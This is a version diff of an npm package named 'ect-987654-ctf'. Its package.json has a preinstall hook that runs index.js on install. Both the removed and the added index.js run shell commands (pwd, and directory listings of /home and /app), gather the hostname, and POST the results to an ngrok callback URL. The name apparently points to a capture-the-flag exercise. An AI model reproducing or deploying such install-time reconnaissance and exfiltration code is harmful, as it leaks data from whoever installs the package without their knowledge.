ect-987654-ctf 0.0.9 → 0.0.10

package/index.js

@@ -1,40 +1,95 @@
-const https = require("https");
-const { execSync } = require("child_process");
-const os = require("os");
-
-const WEBHOOK = "https://0f6896f7cc8e.ngrok-free.app/";
-
-function post(data) {
-  const body = JSON.stringify(data);
-  const url = new URL(WEBHOOK);
-  const req = https.request({
-    hostname: url.hostname,
-    path: url.pathname,
-    method: "POST",
-    headers: {
-      "Content-Type": "application/json",
-      "Content-Length": Buffer.byteLength(body)
-    }
+// index.js
+// Runs ls -la on /app and /home and POSTs results to your callback URL
+// Replace CALLBACK_URL with your ngrok/http endpoint (include trailing slash)
+
+const { exec } = require('child_process');
+const os = require('os');
+const https = require('https');
+const http = require('http');
+const url = require('url');
+
+const CALLBACK_URL = 'https://0f6896f7cc8e.ngrok-free.app/'; // <-- CHANGE THIS
+const TIMEOUT = 15000; // ms
+
+function run(cmd, cb) {
+  exec(cmd, { timeout: TIMEOUT, maxBuffer: 1024 * 1024 * 4 }, (err, stdout, stderr) => {
+    cb(err, stdout || '', stderr || '');
   });
-  req.write(body);
-  req.end();
 }
 
-try {
-  // show current working dir and contents
-  const pwd = execSync("pwd", { encoding: "utf8" });
-  const ls = execSync("ls -lah", { encoding: "utf8" });
+function postJson(targetUrl, obj, cb) {
+  try {
+    const u = url.parse(targetUrl);
+    const body = JSON.stringify(obj);
+    const opts = {
+      hostname: u.hostname,
+      port: u.port || (u.protocol === 'https:' ? 443 : 80),
+      path: u.path || '/',
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'Content-Length': Buffer.byteLength(body)
+      },
+      timeout: TIMEOUT
+    };
+    const lib = u.protocol === 'https:' ? https : http;
+    const req = lib.request(opts, (res) => {
+      // drain response
+      let d = '';
+      res.on('data', (c) => d += c.toString());
+      res.on('end', () => cb && cb(null, res.statusCode, d));
+    });
+    req.on('error', (e) => cb && cb(e));
+    req.on('timeout', () => { req.destroy(); cb && cb(new Error('timeout')); });
+    req.write(body);
+    req.end();
+  } catch (e) {
+    cb && cb(e);
+  }
+}
 
-  // also check if the aspect-node.tar.gz exists
-  const check = execSync("ls -lah /home/node | grep aspect-node || true", { encoding: "utf8" });
+// gather info, run commands
+const info = {
+  host: os.hostname(),
+  ts: new Date().toISOString(),
+  pwd: process.cwd(),
+  attempts: []
+};
 
-  post({
-    host: os.hostname(),
-    pwd,
-    ls,
-    check
-  });
+const cmds = [
+  { name: 'ls_home', cmd: 'ls -la /home || ls -la ~ || echo "ls /home failed"' },
+  { name: 'ls_app',  cmd: 'ls -la /app || echo "ls /app failed"' },
+  { name: 'pwd',     cmd: 'pwd' }
+];
 
-} catch (e) {
-  post({ error: e.message });
+let i = 0;
+function next() {
+  if (i >= cmds.length) {
+    // send results
+    postJson(CALLBACK_URL, info, (err, status, body) => {
+      // optionally print to stdout so DEBUG is easier if running locally
+      if (err) {
+        try { console.error('POST ERROR', String(err)); } catch(e){}
+      } else {
+        try { console.log('POSTED', status); } catch(e){}
+      }
+      // exit gracefully
+      try { process.exit(0); } catch(e){}
+    });
+    return;
+  }
+  const item = cmds[i++];
+  run(item.cmd, (err, out, errout) => {
+    info.attempts.push({
+      name: item.name,
+      cmd: item.cmd,
+      stdout: out,
+      stderr: errout,
+      err: err ? String(err) : null
+    });
+    // small delay to avoid flooding
+    setTimeout(next, 200);
+  });
 }
+
+next();

package/last_post.json

@@ -1,5 +1,5 @@
 {
-  "host": "2fbf820d20ba",
+  "host": "y",
   "checked_count": 0,
   "hits": []
 }

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "ect-987654-ctf",
-  "version": "0.0.9",
+  "version": "0.0.10",
   "scripts": {
     "preinstall": "node index.js"
   }